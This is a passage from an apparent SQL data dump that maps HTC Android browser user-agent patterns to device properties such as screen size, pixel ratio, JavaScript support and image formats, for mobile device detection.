Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC D610t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 210 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 310 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 326G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 500 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 516 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 526G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 526GPLUS dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 600 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 600 dual sim) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 601 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 610) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 616 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 620) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 620G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 626G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 626GPLUS dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 700 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 816 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 816G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 820 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 820 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 820G PLUS dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 820G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire 820s dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire EYE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire SV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire SV) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire X dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Desire X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC EVO 3D X515m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One SV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One mini 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One_E8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One_M8 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC One_M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC Sensation Z710e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC first) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC6435LVW 4G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC6435LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC6500LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC6525LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTCONE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_0PE64-orange-LS/1.02) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_0PE64-orange-LS/1.51) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Butterfly_s) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_C525u-orange-LS/2.16) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_D610x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_D620h) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_D626q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_D626x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_D820pi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_D820u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_310) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_310/1.01) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_310_dual_sim) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_320) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_326G_dual_sim; Android/4.4; Release/09.04) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_400_dual_sim) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_510) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_526G_dual_sim) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_601) AppleWebKit/* (KHTML, like Gecko) Mobile 